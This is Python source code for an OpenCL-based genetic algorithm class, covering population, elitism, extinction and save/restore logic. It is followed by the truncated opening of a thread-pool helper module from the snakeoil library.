        chromosome = self.__sample_chromosome
        if self.__fitness_args is not None:
            # Each extra arg dict has 't' (C type) and 'n' (name); declare
            # each as a global buffer parameter prefixed with _f_.
            fit_args = ', '.join(['global ' + v['t'] + '* _f_' + v['n'] for v in self.__fitness_args])
            fit_argv = ', '.join(['_f_' + v['n'] for v in self.__fitness_args])
            if len(fit_args) > 0:
                # Leading comma so the snippet can append to fixed params.
                fit_args = ', ' + fit_args
                fit_argv = ', ' + fit_argv
        else:
            fit_args = ''
            fit_argv = ''
        return '#define CHROMOSOME_SIZE ' + chromosome.chromosome_size_define + '\n' +\
               '#define CALCULATE_FITNESS ' + self.__fitness_function + '\n' +\
               '#define FITNESS_ARGS ' + fit_args + '\n'+\
               '#define FITNESS_ARGV ' + fit_argv + '\n'
    @property
    def __include_code(self):
        """Chromosome-generated kernel code plus #includes for the gene
        and chromosome kernel files."""
        sample_gene = self.__sample_chromosome.genes[0]
        return self.__sample_chromosome.kernelize() + '\n' +\
               '#include "' + sample_gene.kernel_file + '"\n' +\
               '#include "' + self.__sample_chromosome.kernel_file + '"\n\n'
## private methods
# @var __dictStatistics A dictionary. e.g. { gen : { 'best': best_fitness,
# 'worst': worst_fitness,
# 'avg': avg_fitness },
# 'avg_time_per_gen': avg. elapsed time per generation }
# @var thread The thread runs the actual algorithm.
# @var __population The number of population
# @var __termination A dictionary to identify the termination condition.
# If type is 'time', it means that the iteration will be
# ended after it runs the amount of time.
# If type is 'count', it means that the iteration will be
# ended when it runs the amount of iterations.
# @var __opt_for_max Larger fitness means better solution if 'max', smaller
# fitness is better if it's set to 'min'.
# @var __np_chromosomes The numpy memory which stores the dna of genes of all
# chromosomes.
# @var __is_elitism_mode Off = 0, On = 1. If On, spare chromosomes memory will
# be prepared to hold the best chromosomes of all clients.
# Then put these best of bests into next-gen population.
# @var __elitism_top The number of elites to be picked in each generation.
# @var __elitism_every The number of rounds for server to notify all clients
# that newly sorted elites are coming
# @var __elitism_interval The interval to get current elites since last time.
# @var __elitism_last_retrieval The timestamp of last time when retrieving elites.
# @var __elites_updated Indicating that newly sorted elites are received.
# These elites are going to be updated into dev memory.
# @var __best_fitnesses The list of top N best fitnesses
# @var __worst_fitnesses The list of bottom N worst fitnesses
# @var __best_indices The list of indices of top N best fitnesses
# @var __worst_indices The list of indices of bottom N worst fitnesses
# @var __avg The average of all fitnesses
# @var __extinction A dictionary to identify if a extinction is needed.
#                           If type is 'best_worst', an extinction will be triggered
# when the difference between best fitness and worst fitness is
# smaller than expected value.
# If type is 'best_avg', the operation will be triggered
# when the difference between best fitness and avg fitness
# is smaller than expected value.
# @var _pausing_evt Wait when entering pausing state, it will be set right after
# that particular iteration ends.
    def __init_members(self, options):
        """Populate all member variables from the options dict and start
        the background worker thread that runs the GA loop."""
        self.thread = TaskThread(name='GARun')
        self.thread.daemon = True
        self.thread.start()
        self.__sample_chromosome = options['sample_chromosome']
        self.__termination = options['termination']
        self.__population = options['population']
        self.__opt_for_max = options.get('opt_for_max', 'max')
        self.__np_chromosomes = None
        self.__fitness_function = options['fitness_func']
        self.__fitness_kernel_str = options['fitness_kernel_str']
        self.__fitness_args = options.get('fitness_args', None)
        # For elitism_mode
        elitism_info = options.get('elitism_mode', {})
        self.__elitism_top = elitism_info.get('top', 1)
        self.__elitism_every = elitism_info.get('every', 0)
        # Elitism is enabled only when both 'top' and 'every' are non-zero.
        self.__is_elitism_mode = all([self.__elitism_top, self.__elitism_every])
        self.__elites_updated = False
        self.__elitism_interval = elitism_info.get('interval', 0)
        self.__elitism_last_retrieval = time.time()
        self.__elitism_compressed = elitism_info.get('compress', False)
        self.__elite_lock = threading.Lock()
        # List of fitness and index.
        size_of_indices = self.__elitism_top if self.__is_elitism_mode else 1
        self.__best_fitnesses = numpy.zeros(size_of_indices, dtype=numpy.float32)
        self.__worst_fitnesses = numpy.zeros(size_of_indices, dtype=numpy.float32)
        self.__best_indices = numpy.zeros(size_of_indices, dtype=numpy.int32)
        self.__worst_indices = numpy.zeros(size_of_indices, dtype=numpy.int32)
        self.__avg = 0
        self.__saved_filename = options.get('saved_filename', None)
        self.__prob_mutation = options.get('prob_mutation', 0)
        self.__prob_crossover = options.get('prob_crossover', 0)
        self.__dictStatistics = {}
        # Generally in GA, it depends on the problem to treat the maximal fitness
        # value as the best or to treat the minimal fitness value as the best.
        self.__fitnesses = numpy.zeros(self.__population, dtype=numpy.float32)
        self._elapsed_time = 0
        self._populated = False
        self._pausing_evt = threading.Event()
        self._paused = False
        self._forceStop = False
        self.__generation_index = 0
        self.__generation_time_diff = 0
        # Debug mode is on if the 'debug' key is merely present.
        self.__debug_mode = 'debug' in options
        self.__generation_callback = options['generation_callback']\
                                        if 'generation_callback' in options else None
        self.__extinction = options['extinction']\
                                if 'extinction' in options else None
def __init_cl(self, cl_context, extra_include_path):
    """Create the OpenCL context/queue and assemble the kernel include path.

    :param cl_context: an existing pyopencl Context to reuse, or None to let
                       pyopencl choose/prompt for one.
    :param extra_include_path: list of extra folders to search for kernel
                               headers, searched before the bundled 'kernel' dir.
    """
    # create OpenCL context, queue, and memory
    # NOTE: Please set PYOPENCL_CTX=N (N is the device number you want to use)
    #       at first if it's in external_process mode, otherwise a exception
    #       will be thrown, since it's not in interactive mode.
    # TODO: Select a reliable device during runtime by default.
    self.__ctx = cl_context if cl_context is not None else cl.create_some_context()
    self.__queue = cl.CommandQueue(self.__ctx)
    self.__include_path = []
    kernel_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'kernel')
    paths = extra_include_path + [kernel_path]
    for path in paths:
        # Escape spaces for the CL compiler command line: caret on Windows,
        # backslash elsewhere.
        escapedPath = path.replace(' ', '^ ') if sys.platform.startswith('win')\
                      else path.replace(' ', '\\ ')
        # After looking into the source code of pyopencl/__init__.py,
        # '-I' and the folder path should be separated, and quotes should not
        # be included in the string path.
        self.__include_path.append('-I')
        self.__include_path.append(os.path.join(os.getcwd(), escapedPath))
def __create_program(self):
    """Concatenate the user-supplied codes with kernel/ocl_ga.cl and build
    the OpenCL program, storing it in self.__prg.

    In debug mode the fully expanded source is also dumped to 'final.cl'
    for offline inspection.
    """
    codes = self.__args_codes + '\n' +\
            self.__populate_codes + '\n' +\
            self.__evaluate_code + '\n' +\
            self.__include_code + '\n' +\
            self.__fitness_kernel_str
    kernel_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'kernel')
    # 'with' guarantees the file is closed even if reading raises.
    with open(os.path.join(kernel_path, 'ocl_ga.cl'), 'r') as f:
        fstr = ''.join(f.readlines())
    if self.__debug_mode:
        with open('final.cl', 'w') as fdbg:
            fdbg.write(codes + fstr)
    self.__prg = cl.Program(self.__ctx, codes + fstr).build(self.__include_path)
def __type_to_numpy_type(self, t):
    """Map an OpenCL scalar type name to the matching numpy dtype.

    :param t: 'float' or 'int'
    :returns: numpy.float32 or numpy.int32
    :raises TypeError: for any unsupported type name.
    """
    if t == 'float':
        return numpy.float32
    elif t == 'int':
        return numpy.int32
    else:
        # The original `raise 'unsupported python type'` raised a bare string,
        # which is itself a TypeError in Python 3; raise a proper exception
        # that carries the offending value.
        raise TypeError('unsupported type for kernel argument: {!r}'.format(t))
def __dump_kernel_info(self, prog, ctx, chromosome_wrapper, device = None):
    """Log the estimated resource usage of every kernel this GA launches."""
    wrapper = chromosome_wrapper
    all_kernel_names = (wrapper.get_populate_kernel_names()
                        + ['ocl_ga_calculate_fitness']
                        + wrapper.get_crossover_kernel_names()
                        + wrapper.get_mutation_kernel_names())
    for kernel_name in all_kernel_names:
        utils.calculate_estimated_kernel_usage(prog, ctx, kernel_name)
def __is_extinction_matched(self, best, avg, worst):
    """Return True when the configured extinction criterion is satisfied.

    Supported criteria ('type'):
      * 'best_worst' - |best - worst| fell below 'diff'
      * 'best_avg'   - |best - avg|   fell below 'diff'
    Returns False when extinction is not configured or the type is unknown.
    """
    config = self.__extinction
    if config is None:
        return False
    assert('type' in config)
    assert('diff' in config)
    criterion = config['type']
    if criterion == 'best_worst':
        return abs(best - worst) < config['diff']
    if criterion == 'best_avg':
        return abs(best - avg) < config['diff']
    return False
def __prepare_fitness_args(self):
    """(Re)build the argument list passed to the fitness kernel.

    The chromosome and fitness device buffers always lead the list; any
    user-provided extra arguments are uploaded into fresh device buffers
    and appended after them.
    """
    mf = cl.mem_flags
    extra_buffers = []
    if self.__fitness_args is not None:
        ## create buffers for fitness arguments
        for arg in self.__fitness_args:
            host_values = numpy.array(arg['v'],
                                      dtype=self.__type_to_numpy_type(arg['t']))
            extra_buffers.append(cl.Buffer(self.__ctx,
                                           mf.READ_WRITE | mf.COPY_HOST_PTR,
                                           hostbuf=host_values))
    self.__extra_fitness_args_list = extra_buffers
    # concatenate the fixed buffers with the extra ones
    self.__fitness_args_list = [self.__dev_chromosomes,
                                self.__dev_fitnesses] + extra_buffers
def __preexecute_kernels(self):
    """Allocate every host/device buffer the GA needs and warm up kernels.

    Must run (via prepare()) before the first run(); afterwards chromosomes,
    fitnesses, RNG seeds, elitism scratch space and the best/worst index
    buffers all live on the device.
    """
    total_dna_size = self.__population * self.__sample_chromosome.dna_total_length
    self.__fitnesses = numpy.zeros(self.__population, dtype=numpy.float32)
    self.__np_chromosomes = numpy.zeros(total_dna_size, dtype=numpy.int32)
    mf = cl.mem_flags
    # Random number should be given by Host program because OpenCL doesn't have a random number
    # generator. We just include one, Noise.cl.
    rnum = [random.randint(0, 4294967295) for i in range(self.__population)]
    ## note: numpy.random.rand() gives us a list float32 and we cast it to uint32 at the calling
    ##       of kernel function. It just views the original byte order as uint32.
    self.__dev_rnum = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
                                hostbuf=numpy.array(rnum, dtype=numpy.uint32))
    self.__dev_chromosomes = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
                                       hostbuf=self.__np_chromosomes)
    self.__dev_fitnesses = cl.Buffer(self.__ctx, mf.WRITE_ONLY, self.__fitnesses.nbytes)
    self.__prepare_fitness_args()
    if self.__is_elitism_mode:
        # Scratch buffers for reading current elites out and writing merged
        # elites back in; sized top-N * dna length.
        self.__elites_updated = False
        self.__current_elites = numpy.zeros(self.__sample_chromosome.dna_total_length * self.__elitism_top,
                                            dtype=numpy.int32)
        self.__dev_current_elites = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
                                              hostbuf=self.__current_elites)
        self.__updated_elites = numpy.zeros(self.__sample_chromosome.dna_total_length * self.__elitism_top,
                                            dtype=numpy.int32)
        self.__dev_updated_elites = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
                                              hostbuf=self.__updated_elites)
        self.__updated_elite_fitnesses = numpy.zeros(self.__elitism_top,
                                                     dtype=numpy.float32)
        self.__dev_updated_elite_fitnesses = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
                                                       hostbuf=self.__updated_elite_fitnesses)
    # For statistics
    self.__dev_best_indices = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
                                        hostbuf=self.__best_indices)
    self.__dev_worst_indices = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
                                         hostbuf=self.__worst_indices)
    cl.enqueue_copy(self.__queue, self.__dev_fitnesses, self.__fitnesses)
    ## call preexecute_kernels for internal data structure preparation
    self.__sample_chromosome.preexecute_kernels(self.__ctx, self.__queue, self.__population)
    ## dump information on kernel resources usage
    self.__dump_kernel_info(self.__prg, self.__ctx, self.__sample_chromosome)
## Populate the first generation.
def _generate_population_if_needed(self, prob_mutate, prob_crossover):
    """Populate and evaluate the first generation, exactly once.

    prob_mutate / prob_crossover are accepted for signature symmetry with
    the per-generation hooks but are not used here.
    """
    if self._populated:
        return
    self._populated = True
    self.__sample_chromosome.execute_populate(self.__prg,
                                              self.__queue,
                                              self.__population,
                                              self.__dev_chromosomes,
                                              self.__dev_rnum)
    # Evaluate the fresh population so the first statistics are valid.
    self.__prg.ocl_ga_calculate_fitness(self.__queue,
                                        (self.__population,),
                                        (1,),
                                        *self.__fitness_args_list).wait()
def __examine_single_generation(self, index):
    """Regenerate part of the population when the extinction rule matches.

    Looks at the previous generation's statistics; if the configured
    extinction condition holds, a slice of the population (ratio of the
    total, at least one chromosome) is repopulated from scratch to
    reintroduce diversity.
    """
    # we cannot extinct the first generation
    if index == 0:
        return
    last_result = self.__dictStatistics[index - 1]
    should_extinct = self.__is_extinction_matched(last_result['best'],
                                                  last_result['avg'],
                                                  last_result['worst'])
    # Idiomatic truthiness test instead of the former '== False' comparison.
    if not should_extinct:
        return
    assert('ratio' in self.__extinction)
    # To add 1 for preventing 0 if the population size is too small.
    size = int(self.__population * self.__extinction['ratio']) + 1
    self.__sample_chromosome.execute_populate(self.__prg,
                                              self.__queue,
                                              size,
                                              self.__dev_chromosomes,
                                              self.__dev_rnum)
def __execute_single_generation(self, index, prob_mutate, prob_crossover):
    """Run one GA generation: extinction check, elite merge, selection,
    crossover, mutation, fitness evaluation and statistics recording.

    :param index: zero-based generation number.
    :param prob_mutate: mutation probability handed to the kernels.
    :param prob_crossover: crossover probability handed to the kernels.
    """
    self.__examine_single_generation(index)
    if self.__is_elitism_mode:
        # Elites may be replaced concurrently by update_elites(); the lock
        # keeps the device upload and the flag reset atomic.
        with self.__elite_lock:
            if self.__elites_updated:
                # Update current N elites to device memory.
                self.__sample_chromosome.execute_update_current_elites(self.__prg,
                                                                       self.__queue,
                                                                       self.__elitism_top,
                                                                       self.__dev_worst_indices,
                                                                       self.__dev_chromosomes,
                                                                       self.__dev_updated_elites,
                                                                       self.__dev_fitnesses,
                                                                       self.__dev_updated_elite_fitnesses)
                self.__update_fitness_index_pair()
                self.__elites_updated = False
    best_fitness = self.__best_fitnesses[0]
    self.__sample_chromosome.selection_preparation(self.__prg,
                                                   self.__queue,
                                                   self.__dev_fitnesses)
    # We want to prevent the best one being changed: skip crossover when
    # the population has (numerically) converged.
    if abs(self.__best_fitnesses[0] - self.__worst_fitnesses[0]) >= 0.00001:
        self.__sample_chromosome.execute_crossover(self.__prg,
                                                   self.__queue,
                                                   self.__population,
                                                   index,
                                                   prob_crossover,
                                                   self.__dev_chromosomes,
                                                   self.__dev_fitnesses,
                                                   self.__dev_rnum,
                                                   best_fitness)
    self.__sample_chromosome.execute_mutation(self.__prg,
                                              self.__queue,
                                              self.__population,
                                              index,
                                              prob_mutate,
                                              self.__dev_chromosomes,
                                              self.__dev_fitnesses,
                                              self.__dev_rnum,
                                              self.__extra_fitness_args_list)
    self.__prg.ocl_ga_calculate_fitness(self.__queue,
                                        (self.__population,),
                                        (1,),
                                        *self.__fitness_args_list).wait()
    self.__update_fitness_index_pair()
    best_result = None
    elites_info = {}
    # Reading elites off the device is throttled by elitism_interval seconds.
    if self.__is_elitism_mode and\
       time.time() - self.__elitism_last_retrieval >= self.__elitism_interval:
        # Find current N elites and their corresponding indices, then read
        # it back from device memory to system memory.
        self.__sample_chromosome.execute_get_current_elites(self.__prg,
                                                            self.__queue,
                                                            self.__elitism_top,
                                                            self.__dev_chromosomes,
                                                            self.__dev_current_elites,
                                                            self.__dev_best_indices)
        cl.enqueue_copy(self.__queue, self.__current_elites, self.__dev_current_elites)
        elites_info = self.__get_current_elites_info()
        self.__elitism_last_retrieval = time.time()
        best_result = pickle.dumps(elites_info)
        if best_result and self.__elitism_compressed:
            # Compress data with the highest level.
            best_result = zlib.compress(best_result, 9)
    self.__dictStatistics[index] = {}
    self.__dictStatistics[index]['best'] = self.__best_fitnesses[0]
    self.__dictStatistics[index]['worst'] = self.__worst_fitnesses[0]
    self.__dictStatistics[index]['avg'] = self.__avg
    self.__dictStatistics[index]['best_result'] = best_result
    if self.__generation_callback is not None:
        self.__generation_callback(index, self.__dictStatistics[index])
## This is called at the end of each generation.
def __update_fitness_index_pair(self):
    """Refresh the cached top-N / bottom-N (fitness, index) pairs and avg.

    Fitnesses are read back from the device, ranked in system memory for
    efficiency and code simplicity, and the resulting best/worst index
    arrays are pushed back to the device.
    """
    cl.enqueue_copy(self.__queue, self.__fitnesses, self.__dev_fitnesses)
    indexed = [(position, fitness)
               for position, fitness in enumerate(self.__fitnesses)]
    self.__avg = sum((fitness for _, fitness in indexed), 0.0) / len(indexed)
    assert len(self.__best_indices) == len(self.__best_fitnesses)
    assert len(self.__worst_indices) == len(self.__worst_fitnesses)
    top_n = len(self.__best_indices)
    # Best first when optimizing for 'max', worst first otherwise.
    indexed.sort(key=lambda pair: pair[1], reverse=self.__opt_for_max == 'max')
    for rank, (chromo_idx, fitness) in enumerate(indexed[:top_n]):
        self.__best_indices[rank] = chromo_idx
        self.__best_fitnesses[rank] = fitness
    for rank, (chromo_idx, fitness) in enumerate(indexed[-top_n:]):
        self.__worst_indices[rank] = chromo_idx
        self.__worst_fitnesses[rank] = fitness
    cl.enqueue_copy(self.__queue, self.__dev_best_indices, self.__best_indices)
    cl.enqueue_copy(self.__queue, self.__dev_worst_indices, self.__worst_indices)
def __evolve_by_count(self, count, prob_mutate, prob_crossover):
    """Run up to `count` generations, honouring pause/stop/early-exit.

    On pause or forced stop the device buffers are read back so state can
    be saved; __generation_index records where a later run should resume.
    """
    start_time = time.time()
    for i in range(self.__generation_index, count):
        self.__execute_single_generation(i, prob_mutate, prob_crossover)
        if self.__early_terminated:
            break
        if self._paused:
            self.__generation_index = i + 1
            self.__generation_time_diff = time.time() - start_time
            # cl.enqueue_read_buffer was removed from modern PyOpenCL;
            # enqueue_copy is the supported API the rest of this class uses.
            cl.enqueue_copy(self.__queue, self.__fitnesses, self.__dev_fitnesses)
            cl.enqueue_copy(self.__queue, self.__np_chromosomes, self.__dev_chromosomes).wait()
            break
        if self._forceStop:
            cl.enqueue_copy(self.__queue, self.__fitnesses, self.__dev_fitnesses)
            cl.enqueue_copy(self.__queue, self.__np_chromosomes, self.__dev_chromosomes).wait()
            break
def __evolve_by_time(self, max_time, prob_mutate, prob_crossover):
    """Run generations until `max_time` seconds (including time from a
    previous, paused run) have elapsed or the GA stops early.

    On pause or forced stop the device buffers are read back so state can
    be saved.
    """
    start_time = time.time()
    while True:
        self.__execute_single_generation(self.__generation_index, prob_mutate, prob_crossover)
        # calculate elapsed time, carrying over time spent before a pause
        elapsed_time = time.time() - start_time + self.__generation_time_diff
        self.__generation_index = self.__generation_index + 1
        if self.__early_terminated or elapsed_time > max_time:
            break
        if self._paused:
            self.__generation_time_diff = time.time() - start_time
            # cl.enqueue_read_buffer was removed from modern PyOpenCL;
            # enqueue_copy is the supported API the rest of this class uses.
            cl.enqueue_copy(self.__queue, self.__fitnesses, self.__dev_fitnesses)
            cl.enqueue_copy(self.__queue, self.__np_chromosomes, self.__dev_chromosomes).wait()
            break
        if self._forceStop:
            cl.enqueue_copy(self.__queue, self.__fitnesses, self.__dev_fitnesses)
            cl.enqueue_copy(self.__queue, self.__np_chromosomes, self.__dev_chromosomes).wait()
            break
def _start_evolution(self, prob_mutate, prob_crossover):
    """Run the evolution loop until its termination criterion is met.

    Unless the run ends in a paused state, the final fitnesses and
    chromosomes are read back from the device and the average time per
    generation is recorded in the statistics dict.
    """
    generation_start = time.time()
    ## start the evolution
    if self.__termination['type'] == 'time':
        self.__evolve_by_time(self.__termination['time'], prob_mutate, prob_crossover)
    elif self.__termination['type'] == 'count':
        self.__evolve_by_count(self.__termination['count'], prob_mutate, prob_crossover)
    if self._paused:
        return
    # cl.enqueue_read_buffer was removed from modern PyOpenCL; enqueue_copy
    # is the supported API (and what the rest of this class already uses).
    cl.enqueue_copy(self.__queue, self.__fitnesses, self.__dev_fitnesses)
    cl.enqueue_copy(self.__queue, self.__np_chromosomes, self.__dev_chromosomes).wait()
    total_time_consumption = time.time() - generation_start + self.__generation_time_diff
    avg_time_per_gen = total_time_consumption / float(len(self.__dictStatistics))
    self.__dictStatistics['avg_time_per_gen'] = avg_time_per_gen
def __save_state(self, data):
    """Fill `data` with everything needed to resume this GA later.

    Captures loop bookkeeping, the device-side RNG seeds / fitnesses /
    chromosomes (copied back to host first), headline statistics, the
    mutation/crossover probabilities, and chromosome-specific state.
    NOTE: 'best' and 'worst' are stored as scalars (slot 0 of the arrays).
    """
    # save data from internal structs
    data['generation_idx'] = self.__generation_index
    data['statistics'] = self.__dictStatistics
    data['generation_time_diff'] = self.__generation_time_diff
    data['population'] = self.__population
    # read data from kernel
    rnum = numpy.zeros(self.__population, dtype=numpy.uint32)
    cl.enqueue_copy(self.__queue, rnum, self.__dev_rnum)
    cl.enqueue_copy(self.__queue, self.__fitnesses, self.__dev_fitnesses)
    cl.enqueue_copy(self.__queue, self.__np_chromosomes, self.__dev_chromosomes)
    # save kernel memory to data
    data['rnum'] = rnum
    data['fitnesses'] = self.__fitnesses
    data['chromosomes'] = self.__np_chromosomes
    data['best'] = self.__best_fitnesses[0]
    data['worst'] = self.__worst_fitnesses[0]
    data['avg'] = self.__avg
    # save algorithm information
    data['prob_mutation'] = self.__prob_mutation
    data['prob_crossover'] = self.__prob_crossover
    # let the chromosome append its own state
    self.__sample_chromosome.save(data, self.__ctx, self.__queue, self.__population)
def __restore_state(self, data):
    """Rebuild host and device state from a dict produced by __save_state.

    Leaves the GA in the paused state, ready to be resumed with run().
    """
    # restore algorithm information
    self.__prob_mutation = data['prob_mutation']
    self.__prob_crossover = data['prob_crossover']
    self.__generation_index = data['generation_idx']
    self.__dictStatistics = data['statistics']
    self.__generation_time_diff = data['generation_time_diff']
    self.__population = data['population']
    rnum = data['rnum']
    self.__fitnesses = data['fitnesses']
    self.__np_chromosomes = data['chromosomes']
    # __save_state stores 'best'/'worst' as scalars. Write them back into
    # slot 0 of the tracking arrays instead of replacing the arrays with
    # scalars, which would crash __update_fitness_index_pair's len()/index
    # operations on the next generation.
    self.__best_fitnesses[0] = data['best']
    self.__worst_fitnesses[0] = data['worst']
    self.__avg = data['avg']
    # build CL memory from restored memory
    mf = cl.mem_flags
    self.__dev_rnum = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
                                hostbuf=numpy.array(rnum, dtype=numpy.uint32))
    self.__dev_chromosomes = cl.Buffer(self.__ctx, mf.READ_WRITE | mf.COPY_HOST_PTR,
                                       hostbuf=self.__np_chromosomes)
    self.__dev_fitnesses = cl.Buffer(self.__ctx, mf.WRITE_ONLY | mf.COPY_HOST_PTR,
                                     hostbuf=self.__fitnesses)
    self.__prepare_fitness_args()
    self.__sample_chromosome.restore(data, self.__ctx, self.__queue, self.__population)
    self._paused = True
# public methods
@EnterExit()
def prepare(self):
    """Allocate device buffers and warm up kernels; call before run()."""
    self.__preexecute_kernels()
def __end_of_run(self):
    """Completion hook for a GARun task.

    Wakes a thread blocked in pause(), or — for a normal finish — tears the
    GA down via stop() on a separate daemon thread (presumably so stop()'s
    thread cleanup does not run on the worker thread itself).
    """
    if not self._paused:
        stopper = threading.Thread(target=self.stop)
        stopper.daemon = True
        stopper.start()
    else:
        self._pausing_evt.set()
@EnterExit()
def run(self, arg_prob_mutate = 0, arg_prob_crossover = 0):
    """Kick off (or resume) evolution asynchronously on the worker thread.

    Non-zero arguments override the probabilities from the options dict;
    the effective values must lie strictly between 0 and 1.
    This function is not supposed to be overriden.
    """
    prob_mutate = arg_prob_mutate if arg_prob_mutate else self.__prob_mutation
    prob_crossover = arg_prob_crossover if arg_prob_crossover else self.__prob_crossover
    assert 0 < prob_mutate < 1, 'Make sure you have set it in options or passed when calling run.'
    assert 0 < prob_crossover < 1, 'Make sure you have set it in options or passed when calling run.'
    # Identity comparison is the canonical None check (PEP 8), not '!='.
    assert self.thread is not None
    self._forceStop = False
    self._paused = False
    task = GARun(self, prob_mutate, prob_crossover, self.__end_of_run)
    self.thread.addtask(task)
@EnterExit()
def stop(self):
    """Force evolution to halt and tear down the worker thread."""
    self._forceStop = True
    worker = self.thread
    if worker:
        worker.stop()
        self.thread = None
@EnterExit()
def pause(self):
    """Request a pause and block until the evolution loop acknowledges it.

    The worker signals _pausing_evt (via __end_of_run) once it reaches a
    safe point; the event is then cleared for the next pause cycle.
    """
    self._paused = True
    self._pausing_evt.wait()
    self._pausing_evt.clear()
@EnterExit()
def save(self, filename = None):
    """Pickle the paused GA state to disk.

    The 'saved_filename' option, when set, takes precedence over the
    filename argument. The GA must be paused first so that host buffers
    are in sync with device memory.
    """
    assert self._paused, 'save is only available while paused'
    data = dict()
    self.__save_state(data)
    fname = self.__saved_filename if self.__saved_filename else filename
    # Context manager closes the file even if pickling raises.
    with open(fname, 'wb') as f:
        pickle.dump(data, f)
@EnterExit()
def restore(self, filename = None):
    """Load pickled GA state from disk and rebuild host/device memory.

    The 'saved_filename' option, when set, takes precedence over the
    filename argument.
    """
    fname = self.__saved_filename if self.__saved_filename else filename
    # TODO : Should check file existence ?
    # Context manager closes the file even if unpickling raises.
    with open(fname, 'rb') as f:
        data = pickle.load(f)
    self.__restore_state(data)
def get_statistics(self):
    """Return the per-generation statistics dict (best/worst/avg/best_result)."""
    return self.__dictStatistics
def __get_current_elites_info(self):
    """Return the current elites with their fitnesses, or {} when elitism
    is disabled.

    The dict contains:
      elites    - flat DNA array, e.g. abcdedabcdefdeeacbadeadebcda
      fitnesses - e.g. 4, 5.5, 3.7, 7.1
      dna_size  - e.g. 7
    With the elites length being 28 and dna_size 7, the flat array splits
    into 4 separate chromosomes matching the fitnesses in order.
    """
    if not self.__is_elitism_mode:
        return {}
    return {'elites': self.__current_elites,
            'fitnesses': self.__best_fitnesses,
            'dna_size': self.__sample_chromosome.dna_total_length}
def get_the_best(self):
    """Return (raw dna list, fitness, decoded dna) of the best chromosome.

    'Best' means maximal or minimal fitness depending on the opt_for_max
    option.
    """
    assert self.__opt_for_max in ['max', 'min']
    # Dispatch through a dict instead of eval(): eval on an attribute value
    # is slower and a needless code-injection hazard.
    pick = {'max': max, 'min': min}[self.__opt_for_max]
    best_fitness = pick(value for value in self.__fitnesses)
    best_index = list(self.__fitnesses).index(best_fitness)
    # We had convert chromosome to a cyclic gene. So, the num_of_genes in CL
    # is more than python by one.
    startGeneId = best_index * (self.__sample_chromosome.num_of_genes)
    endGeneId = (best_index + 1) * (self.__sample_chromosome.num_of_genes)
    best = [v for v in self.__np_chromosomes[startGeneId:endGeneId]]
    return best, best_fitness, self.__sample_chromosome.from_kernel_value(best)
## Update the top N(sorted) elites of all elites provided from all workers
# to chromosomes device memory.
def update_elites(self, elites):
    """Upload the top-N elites gathered from all workers to device memory.

    :param elites: list of exactly elitism_top (fitness, dna, worker_id)
                   tuples. Only valid in elitism mode; ignored unless the
                   state machine is running.
    The actual splice into the population happens on the next generation
    under __elite_lock (see __execute_single_generation).
    """
    assert self.__is_elitism_mode, 'Elitism Mode is {}'.format(self.__is_elitism_mode)
    assert len(elites) == self.__elitism_top
    if not self.state_machine.is_running():
        return
    with self.__elite_lock:
        elites_dna_data = []
        elites_fitnesses = []
        # Concatenate all elites' dna / fitness into a single continuous memory
        # layout.
        for idx, elite_info in enumerate(elites):
            fitness, elite_dna, worker_id = elite_info
            if idx == 0:
                # NOTE(review): stdout print rather than a logger; presumably
                # intentional progress output -- confirm.
                print('updating {}/{} elites ... fitness = {} from worker {}'.format(idx+1, len(elites), fitness, worker_id))
            elites_dna_data.extend(elite_dna)
            elites_fitnesses.append(fitness)
        # Convert the continuous memory to a device compatible memory layout.
        self.__updated_elites = numpy.asarray(elites_dna_data, dtype=numpy.int32)
        self.__updated_elite_fitnesses = numpy.asarray(elites_fitnesses, dtype=numpy.float32)
        # Transfer it into device memory.
        cl.enqueue_copy(self.__queue, self.__dev_updated_elites, self.__updated_elites)
        cl.enqueue_copy(self.__queue, self.__dev_updated_elite_fitnesses, self.__updated_elite_fitnesses)
        self.__elites_updated = True
|
thread_pool.py | # Copyright: 2011 Brian Harring <ferringb@gmail.com>
# License: GPL2/BSD 3 clause
from collections import deque
import threading
from types import GeneratorType
import queue
from snakeoil.compatibility import IGNORED_EXCEPTIONS
from snakeoil.demandload import demandload
demandload(
'multiprocessing:cpu_count',
)
def reclaim_threads(threads):
    """Join every thread in `threads`, best-effort.

    Exceptions in snakeoil's IGNORED_EXCEPTIONS (interpreter-fatal ones)
    always propagate; any other failure to join one thread is deliberately
    swallowed so the remaining threads are still reclaimed.
    """
    for x in threads:
        try:
            x.join()
        except IGNORED_EXCEPTIONS:
            raise
        except Exception:
            # should do something better here (e.g. log), but stay
            # best-effort: one bad thread must not block the rest.
            pass
def map_async(iterable, functor, *args, **kwds):
    """Feed `iterable` through a thread pool; each thread runs
    functor(queue_iterator, *args, *per_thread_args(), **kwds, **per_thread_kwds()).

    Keyword-only controls (popped from kwds): 'threads' (pool size,
    defaults to cpu_count()), 'per_thread_args' / 'per_thread_kwds'
    (callables producing extra per-thread arguments). Non-None results are
    collected into the returned deque; generator results are flattened.
    """
    per_thread_args = kwds.pop("per_thread_args", lambda: ())
    per_thread_kwds = kwds.pop("per_thread_kwds", lambda: {})
    parallelism = kwds.pop("threads", None)
    if parallelism is None:
        parallelism = cpu_count()
    if hasattr(iterable, '__len__'):
        # if there are less items than parallelism, don't
        # spawn pointless threads.
        parallelism = max(min(len(iterable), parallelism), 0)
    # note we allow an infinite queue since .put below is blocking, and won't
    # return till it succeeds (regardless of signal) as such, we do it this way
    # to ensure the put succeeds, then the keyboardinterrupt can be seen.
    q = queue.Queue()
    results = deque()
    kill = threading.Event()
    kill.clear()

    def iter_queue(kill, qlist, empty_signal):
        # Event.isSet() was deprecated and removed in Python 3.12;
        # is_set() is the supported spelling with identical behavior.
        while not kill.is_set():
            item = qlist.get()
            if item is empty_signal:
                return
            yield item

    def worker(*args):
        result = functor(*args)
        if result is not None:
            # avoid appending chars from a string into results
